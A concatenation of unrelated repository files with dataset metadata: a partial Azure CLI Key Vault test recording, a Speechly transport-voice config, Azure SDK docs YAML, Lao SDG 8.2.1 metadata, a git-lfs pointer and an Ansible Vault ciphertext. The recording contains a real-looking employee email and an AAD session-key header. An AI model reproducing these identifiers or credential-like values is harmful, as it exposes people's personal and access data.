(Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:22 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:28 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:34 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","status":"NotStarted"}' headers: cache-control: - no-cache content-length: - '64' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:39 GMT expires: - '-1' location: - https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 202 message: Accepted - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/operationResults/VVR8MDYzNzIwNTU1ODgzNjY4Mjk2MHw4MENFOTBEOTY1NEU0RkEyQkE3Njk3MjY0NzZENTQwMA?api-version=2019-09-01 response: body: string: '{"createdDateTime":"2020-03-23 10:24:42Z","lastActionDateTime":"2020-03-23 10:25:41Z","status":"Succeeded"}' headers: cache-control: - no-cache content-length: - '107' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:44 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate Connection: - keep-alive User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-graphrbac/0.60.0 Azure-SDK-For-Python accept-language: - en-US method: GET uri: https://graph.windows.net/00000000-0000-0000-0000-000000000000/me?api-version=1.6 response: body: string: '{"odata.metadata":"https://graph.windows.net/00000000-0000-0000-0000-000000000000/$metadata#directoryObjects/@Element","odata.type":"Microsoft.DirectoryServices.User","objectType":"User","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","deletionTimestamp":null,"accountEnabled":true,"ageGroup":null,"assignedLicenses":[],"assignedPlans":[],"city":null,"companyName":null,"consentProvidedForMinor":null,"country":null,"createdDateTime":"2019-10-21T06:37:42Z","creationType":"Invitation","department":null,"dirSyncEnabled":null,"displayName":"Bin Ma","employeeId":null,"facsimileTelephoneNumber":null,"givenName":null,"immutableId":null,"isCompromised":null,"jobTitle":null,"lastDirSyncTime":null,"legalAgeGroupClassification":null,"mail":"bim@microsoft.com","mailNickname":"bim_microsoft.com#EXT#","mobile":null,"onPremisesDistinguishedName":null,"onPremisesSecurityIdentifier":null,"otherMails":["bim@microsoft.com"],"passwordPolicies":null,"passwordProfile":null,"physicalDeliveryOfficeName":null,"postalCode":null,"preferredLanguage":null,"provisionedPlans":[],"provisioningErrors":[],"proxyAddresses":["SMTP:bim@microsoft.com"],"refreshTokensValidFromDateTime":"2019-10-21T06:37:41Z","showInAddressList":false,"signInNames":[],"sipProxyAddress":null,"state":null,"streetAddress":null,"surname":null,"telephoneNumber":null,"thumbnailPhoto@odata.mediaEditLink":"directoryObjects/9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa/Microsoft.DirectoryServices.User/thumbnailPhoto","usageLocation":null,"userIdentities":[],"userPrincipalName":"bim_microsoft.com#EXT#@AzureSDKTeam.onmicrosoft.com","userState":"Accepted","userStateChangedOn":"2019-10-21T06:39:35Z","userType":"Guest"}' headers: access-control-allow-origin: - '*' cache-control: - no-cache content-length: - '1668' content-type: - application/json; odata=minimalmetadata; streaming=true; charset=utf-8 dataserviceversion: - 3.0; date: - Mon, 23 Mar 2020 10:25:48 GMT duration: - '2557530' expires: - '-1' ocp-aad-diagnostics-server-name: - beTCLut3q20aNqXw2LS1tHYjTpj7MjHnAgyhSr7QHg0= ocp-aad-session-key: - TOHJGHb3BWNNr8XQOgZofULb1ThCPHxUBQHcj9cW37fWKEvEpGgU9oU6I9OMS006XtXYq-9k1leuRyoX-_omRJKJmhdNawvBha1km41omR77HOiVXXXyvD-3rznrw-xZ.mthrr0lZ1WOIn5hgWJtMMw0hJ_lI40x5Kk07T7JBtfY pragma: - no-cache request-id: - 170fd239-c4f8-4ceb-8fb1-2c3409fc1716 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-ms-dirapi-data-contract-version: - '1.6' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "standard"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["get", "create", "delete", "list", "update", "import", "backup", "restore", "recover"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["get", "list", "delete", "create", "import", "update", "managecontacts", "getissuers", "listissuers", "setissuers", "deleteissuers", "manageissuers", "recover"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "enableSoftDelete": true, "softDeleteRetentionInDays": 90, "enableRbacAuthorization": false, "enablePurgeProtection": true}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive Content-Length: - '870' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n -l --enable-soft-delete --enable-purge-protection User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000005?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000005","name":"cli-test-kv-mgmt-000005","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":true,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"enablePurgeProtection":true,"vaultUri":"https://cli-test-kv-mgmt-000005.vault.azure.net","provisioningState":"RegisteringDns"}}' headers: cache-control: - no-cache content-length: - '1222' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:25:55 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault create Connection: - keep-alive ParameterSetName: - -g -n -l --enable-soft-delete --enable-purge-protection User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000005?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000005","name":"cli-test-kv-mgmt-000005","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"standard"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["get","create","delete","list","update","import","backup","restore","recover"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":false,"enableSoftDelete":true,"softDeleteRetentionInDays":90,"enableRbacAuthorization":false,"enablePurgeProtection":true,"vaultUri":"https://cli-test-kv-mgmt-000005.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1218' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:26:27 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK version: 1
91.025
26,889
0.762627
8bdf74b983a7d7ae845a5bd485e4fddd43677c13
1,271
yaml
YAML
configuration/main.yaml
aukkonen/voice-tfl
15810ff59ac8dac4c795d20b497674452a0d1dff
[ "MIT" ]
null
null
null
configuration/main.yaml
aukkonen/voice-tfl
15810ff59ac8dac4c795d20b497674452a0d1dff
[ "MIT" ]
null
null
null
configuration/main.yaml
aukkonen/voice-tfl
15810ff59ac8dac4c795d20b497674452a0d1dff
[ "MIT" ]
null
null
null
enable_strict_nlu: true imports: - name: naptan_id source: stations.csv field: 1 - name: station_names source: stations.csv field: 2 - name: arrival_as_spoken source: arrival.csv field: 1 - name: arrival_out source: arrival.csv field: 2 - name: departure_as_spoken source: departure.csv field: 1 - name: departure_out source: departure.csv field: 2 entities: - name: from type: lookup input_items: $station_names output_items: $naptan_id variant: snapping - name: to type: lookup input_items: $station_names output_items: $naptan_id variant: snapping - name: depart_prepo type: lookup input_items: $departure_as_spoken output_items: $departure_out - name: arrival_prepo type: lookup input_items: $arrival_as_spoken output_items: $arrival_out - name: time type: time templates: | from_phrase = [from](from_prepo) $station_names(from) to_phrase = [to](to_prepo) $station_names(to) depart_phrase = $departure_as_spoken(depart_prepo) $SPEECHLY.TIME(time) arrive_phrase = $arrival_as_spoken(arrive_prepo) $SPEECHLY.TIME(time) *search ![$from_phrase | $to_phrase | $depart_phrase] *search ![$from_phrase | $to_phrase | $arrive_phrase]
25.938776
73
0.700236
e302ab1bd70ec254b468ebe95471d105eee03bc9
472
yml
YAML
preview-packages/docs-ref-autogen/@azure/arm-sql/TransparentDataEncryptionActivity.yml
vicancy/azure-docs-sdk-node
3d77ea75961b13263450dec56c02b99cb62a1851
[ "CC-BY-4.0", "MIT" ]
59
2017-07-07T17:57:53.000Z
2022-03-25T16:36:13.000Z
preview-packages/docs-ref-autogen/@azure/arm-sql/TransparentDataEncryptionActivity.yml
vicancy/azure-docs-sdk-node
3d77ea75961b13263450dec56c02b99cb62a1851
[ "CC-BY-4.0", "MIT" ]
1,322
2017-06-20T20:51:24.000Z
2022-03-29T21:20:34.000Z
preview-packages/docs-ref-autogen/@azure/arm-sql/TransparentDataEncryptionActivity.yml
vicancy/azure-docs-sdk-node
3d77ea75961b13263450dec56c02b99cb62a1851
[ "CC-BY-4.0", "MIT" ]
159
2017-06-21T00:35:28.000Z
2022-03-28T23:37:18.000Z
### YamlMime:TSTypeAlias name: TransparentDataEncryptionActivity uid: '@azure/arm-sql.TransparentDataEncryptionActivity' package: '@azure/arm-sql' summary: Represents a database transparent data encryption Scan. fullName: TransparentDataEncryptionActivity remarks: '' isPreview: false isDeprecated: false syntax: >- type TransparentDataEncryptionActivity = ProxyResource & { location: Object, percentComplete: Object, status: TransparentDataEncryptionActivityStatus }
36.307692
78
0.82839
6844a5312e0e1f3dc22169729eded2db3f35ef74
7,231
yml
YAML
translations/meta/en/8-2-1.yml
brockfanning/fcdo-la-data
955ab596734a27ce1fbe8911b08168583217865f
[ "MIT" ]
1
2022-03-20T16:04:57.000Z
2022-03-20T16:04:57.000Z
translations/meta/en/8-2-1.yml
weblate/data-1
ff5da54cd7f966c4c531d1d812797de41dda1213
[ "MIT" ]
7
2021-06-17T10:14:48.000Z
2021-12-20T03:55:17.000Z
translations/meta/en/8-2-1.yml
SDG-Laos/sdg-laos-data
89b93331ee118981c7ea995e6afbd63685e3f47f
[ "MIT" ]
1
2021-06-02T01:00:20.000Z
2021-06-02T01:00:20.000Z
ADJUSTMENT: <p>N/A</p> CLASS_SYSTEM: <p>N/A</p> COLL_METHOD: '<p>Need description for administrative data from Lao Statistics Bureau</p><p>The Labor Force Survey that was implemented in Lao People’s Democratic Republic in 2017 (LFS 2017) adopts the new concept of work, employment and labor underutilization that was adopted by the19th International Conference of Labor Statisticians (ICLS) in 2013.</p><h2><strong>Sampling</strong></h2><p>Sampling Procedure</p><p>The 2015 Census of Population and Housing was applied for sampling frame for LFS 2017. Base on the Census, Lao PDR has a total population of 6,479,982 distributed into 1,197,926 households . The province of Savannakhet has the most population but Vientiane Capital has the most households. Population in Xaysomboun is lowest at 85,168, the province also has the lowest number of households at 14,316.<br/><br/>Two stage sampling is proposed, with selection of villages in </p><ul><li>the first stage and selection of households in the second stage. In the provincial domains, villages were selected using PPS (no need for stratification since there are fewer villages within each province). </li><li>Second stage sampling comprise of systematic selection of 20 households from the updated list of households from the 2015 Census. Provincial Domains target 10,800 sample households at 3% and 6% margin of errors. </li></ul><p><strong>Data Collection: </strong>Start: 2017, End: 2017</p><p><strong>Data collection Mode: </strong>Face-to-Face</p>' COMPARABILITY: <p>N/A</p> COMPILING_ORG: <p>Lao Statistics Bureau</p> CONTACT_EMAIL: <p><a href="mailto:vilaysooks@gmail.com">vilaysooks@gmail.com</a></p><p><a href="mailto:lstats@lsb.gov.la">lstats@lsb.gov.la</a></p><p>https://www.lsb.gov.la</p> CONTACT_FUNCT: <p>Deputy Director General</p> CONTACT_MAIL: <p>N/A</p> CONTACT_NAME: <p>Mr.Vilaysook SISOULATH</p> CONTACT_ORGANISATION: <p>Lao Statistics Bureau</p> CONTACT_PHONE: <p>+856 20 55 795 043</p><p>+856 21 214 740</p> COVERAGE: <p>The Labor Force Survey have been conducted at five-year intervals since 2010</p><p>No disaggregation required for this indicator.</p> DATA_COMP: <p>Real GDP per employed person= (GDP at constant prices )/(Total employment)</p><p>The numerator and denominator of the equation above should refer to the same reference period, for example, the same calendar year.</p><p>If we call the real GDP per employed person “LabProd”, then the annual growth rate of real GDP per employed person is calculated as follows:</p><p>Annual growth rate of real GDP per employed person= ((LabProd in year n) –(LabProd in year n-1))/((LabProd in year n-1)) ×100</p> DATA_SOURCE: <p>Lao Statistics Bureau</p> DATA_VALIDATION: <p>N/A</p> DOC_METHOD: <p>N/A</p> FREQ_COLL: <p>2021</p> IMPUTATION: <p>N/A</p> INST_MANDATE: <p>Base on the statistical law and the National Strategy for sustainable Development of Statistical System 2016-2020 and vision for 2030, Ministry of Planning and Investment (MPI) throughout the Lao Statistics Bureau in cooperate with Ministry of Labor and Welfare has conducted the Lao Labor Force Survey in 2017.</p> META_LAST_UPDATE: <p>1 May 2021</p> ORGANISATION_UNIT: <p>Department of Social Statistics</p> OTHER_DOC: <ol><li><a href="file:///C:/Users/BK/AppData/Local/Temp/5.Lao%20PDR%20Labor%20force%20Survey%202017.pdf">file:///C:/Users/BK/AppData/Local/Temp/5.Lao%20PDR%20Labor%20force%20Survey%202017.pdf</a></li><li>https://unstats.un.org/sdgs/metadata/</li></ol> QUALITY_ASSMNT: <p>N/A</p> QUALITY_ASSURE: <p>N/A</p> QUALITY_MGMNT: <p>N/A</p> REC_USE_LIM: <p>Output measures are obtained from national accounts and represent, as much as possible, GDP at market prices for the aggregate economy. However, despite common principles that are mostly based on the United Nations System of National Accounts, there are still significant problems in international consistency of national accounts estimates, based on factors such as differences in the treatment of output in services sectors, differences in methods used to correct output measures for price changes (in particular, the use of different weighting systems to obtain deflators) and differences in the degree of coverage of informal economic activities.</p><p>Data on employment used in the denominator of this indicator refer, as much as possible, to the average number of persons with one or more paid jobs during the year. That is, the reliability of the employment data is also dependent on the degree of coverage of informal activities by the statistical source used.</p> REG_AGG: <p>N/A</p> REL_CAL_POLICY: <p>2022</p> SDG_CUSTODIAN_AGENCIES: <p>ILO</p> SDG_GOAL: '<p>SDG 8: Decent Work and Economic Growth: Promote sustained, inclusive and sustainable economic growth, full and productive employment and decent work for all</p>' SDG_INDICATOR: <p>8.2.1 Percentage of growth in labour productivity (GDP/per person employed)</p> SDG_RELATED_INDICATORS: <p>N/A</p> SDG_SERIES_DESCR: <p>SL_EMP_PCAP</p> SDG_TARGET: <p>8.2 Achieve higher levels of economic productivity through diversification, technological upgrading and innovation, including through a focus on high-value added and labour-intensive sectors.</p> SOURCE_TYPE: '<p>Numerator: administrative data from Lao Statistics Bureau</p><p>Denominator: The Labor Force Survey 2017</p>' STAT_CONC_DEF: '<p><strong>Definition:</strong></p><p>The annual growth rate of real GDP per employed person conveys the annual percentage change in real Gross Domestic Product per employed person.</p><p><strong>Concepts:</strong></p><p>Gross Domestic Product (GDP): It is the main measure of national output, representing the total value of all final goods and services within the System of National Accounts (SNA) production boundary produced in a particular economy (that is, the dollar value of all goods and services within the SNA production boundary produced within a country’s borders in a given year). According to the SNA, “GDP is the sum of gross value added of all resident producer units plus that part (possibly the total) of taxes on products, less subsidies on products, that is not included in the valuation of output … GDP is also equal to the sum of the final uses of goods and services (all uses except intermediate consumption) measured at purchasers’ prices, less the value of imports of goods and services GDP is also equal to the sum of primary incomes distributed by resident producer units.”</p><p>Real Gross Domestic Product (GDP): Real GDP refers to GDP calculated at constant prices, that is, the volume level of GDP, excluding the effect of inflation and favouring comparisons of quantities beyond price changes. Constant price estimates of GDP are calculated by expressing values in terms of a base period. In theory, the price and quantity components of a value are identified and the price in the base period is substituted for that in the current period.</p><p>Employment: All persons of working age who, during a short reference period (one week), were engaged in any activity to produce goods or provide services for pay or profit.</p>'
71.594059
262
0.766007
4186b5709ef42d6a6dd0a4abdd5fb747a73d11aa
127
yaml
YAML
tests/minimal/phase1/ssz_static/SignedAggregateAndProof/ssz_random/case_15/roots.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
1
2021-11-20T20:19:46.000Z
2021-11-20T20:19:46.000Z
tests/minimal/phase1/ssz_static/SignedAggregateAndProof/ssz_random/case_15/roots.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
null
null
null
tests/minimal/phase1/ssz_static/SignedAggregateAndProof/ssz_random/case_15/roots.yaml
vapory-testing/vap2.0-spec-tests
b4283b90ecb9178d011863f4fb14efefce53d82f
[ "MIT" ]
null
null
null
version https://git-lfs.github.com/spec/v1 oid sha256:02b6080b91e734d50224c6980df1bed8cfeb2e1b38a5ae1db8abc3ab2746d6fb size 77
31.75
75
0.88189
317012263d21ea4b6afac499213d8bf946ded8ef
73,125
yml
YAML
environments/staging/vault.yml
demis-svenska/aws-echis
0c64b64c58d021f4157dcb6b8acb720fe942bca8
[ "BSD-3-Clause" ]
null
null
null
environments/staging/vault.yml
demis-svenska/aws-echis
0c64b64c58d021f4157dcb6b8acb720fe942bca8
[ "BSD-3-Clause" ]
null
null
null
environments/staging/vault.yml
demis-svenska/aws-echis
0c64b64c58d021f4157dcb6b8acb720fe942bca8
[ "BSD-3-Clause" ]
null
null
null
$ANSIBLE_VAULT;1.1;AES256 31666463613535653137643766303338636639333732323065346430393038303339636231396135 3866356335343732613963656465393464613235393636630a636139656262353337616236636333 35646236383433303162613730643835393764393232373861353138363239353464373736653637 3531663933636438630a643065653432306239363835363831633532396665323036653835363561 31393664626435376631323632383230363732656138303132393738313539343831663039313339 36353437656132636537393438383531363937346234623833336165326636383036643664613161 65313963623961373235643839363939656436616465323962316463346333343936333933363464 36363262333739663131343138663562653136303934363332316265653838613235633839626230 62356435343236326332666461643266373566353966643261646266643266633763336532666666 31663836633061316539383332643230626139336137653932383763613737306530373230343031 34363237386235323536636364363665376639383139306231346537636138646535323932666338 38363832316166653564383232343066363064643861353833316432626536366432616533666462 63366334666633653233653163393663613037306663323136656661323335386337656439336538 65363735663563303965303863636366313863643938303063383963393533633766623332356231 65643961626236646232366663303463303861396465383835373836333761653961666535323230 36623337393839356437643937613236633265623461386335326266306566336630343166616636 32353061376163376634643364396430666439383535643866346466353763306566386265353336 63306338613065623661666237373665376561376462663836373464366363366136393633643536 65333130336434373636386538666531386463303661343134626363663636323030623235656538 31383964323262363936663031393261613731316134363435376337306663636237623233643136 32316565663061376337343865663766613634336531666534343866613235386331353563303437 39343565393563346237313364656238633661316530643661323436346463366463303631633431 30373638633731393365383465323932303836396261386164356366653061666434663238383465 34323961643262636233373738386535343265343630333264616636613331353462343566333931 37303263356238336236643932653136353031393038313538616130636234356338613435616436 62363237653437623637336364363461643038636334383438353139333131326162306362613331 39363633303533613031363535366635626333306332306335636532366437383439333632643863 33383331396438386638383037313239303032316630323131613030326434393239366232303136 63323334383837666338303737313336386239306462373561643631636630366139386165613737 32343131363330623138646266363530336164376365383566626661313638633963376237316337 61666534666562663865623265373630643565393532326333326633616233313436663634363164 61373037643831376266343666333264376639303066393462643233616562393534336665373065 30313366663538313362306636383038633434613837663664666636326539376236346437366562 32333233656632346363663865323365303833366531333165343032306436613561343131653962 38623464326434656665643032303637353432306435393738306362333136666434356439343965 35373363303335623934313131333639613239626237393531623564643630313833613464333362 35666630353130373662346338323635313262336133373439623131636437386331373931383739 66653862363164306265356237333039303565663664393639376530626135356235666235386633 35633865356362356238393261313632643932313435643331643163383163313032633137653764 64393763316132393130393162613562366138653462646638386534326537386262303233636236 33323837666433613436366237663833623936386131366566616332376661393335333931386334 38333332616661343538313735353933353037613233356363396563623061303639313730633439 31623630366162626264666539623533613135633039383733363864366464383664363130343761 63326663623061643334613938663431393732353733313836323733326235636634383637373164 31346365383338393665363539326639376138336537636463383633613631366163363064393830 37666362613364346331306666353862616630303639383931646332656535356237636463353836 62666262353231333934386436316161333236356465663864616339613030326363646433633938 34393036656466393531353465303631343262313233633464653934393136343139633836333532 62643266633131303138336130653863396534313235366665353730373366373866353866613239 34396435356636356536636332333966626430353530363734663666313131373966343530663830 30323335373431616635383730663731396431343839633837623430383862646638366531646136 34633963333730666262393533356337633134623862343766326433643361346661373438643339 63313734626131303438353839643063646161316462373135376461323836393230616338376666 31346563633563326265646163356234356661323666613331346464393232306161623364623262 30316137623733313538633838336439343932343939636630393763613265343838666234366565 37336164383861383865326539663333643031393333353062626265616162633561313861316561 35396164366534343437313334313439393661666334663261646435336264646662323537653864 33316633626264363665366564356665646539666262396530316132373766653838626139303764 61386465636636383564626232333561653962353931656533323863313236356566633439656266 35633462326465313335326538633536323032353534656466656131363034626530306563643661 37306562656261346162326438323865363965333766386133353739666363653161636264653930 33613532663830303362633565323065326530336236333737366662633132343264663961396466 64393135653339393130363737306133313262636462376262333137306238373266376634343661 36333438396162643730643336613339303639626161363866363965366138663536663564666132 39366161376632313137643735376661626363646661393638376265356334373636313738623331 64643731633539643965616636653961316461376631313534383139346139656539363733353565 61623435353434616136633365613635336639313434366666383262343137643834656338353163 38663734646332333130633032346266393138643261306539323033656234376334373065613961 61356561346639343730663335623366373237326334663136363963646633333934386361376632 37336431616465633362646566356435323034613461366336333262616432343964396232373936 33366133613764306534393839353466373430646530363036333637643033616530383864323538 35656338333135333739353531613830316661346636343137343339663562393539656264316234 32656533303638363535666232653234303839303732656338333436616363613136306632353736 34623862666234386431353363336238616434303030373563656461333735343133313534326466 62393737336536353831613261373938373965646135323964386262653032383164373936373766 34636563333338646436643631623562316130643231653063666532613938313237623565613339 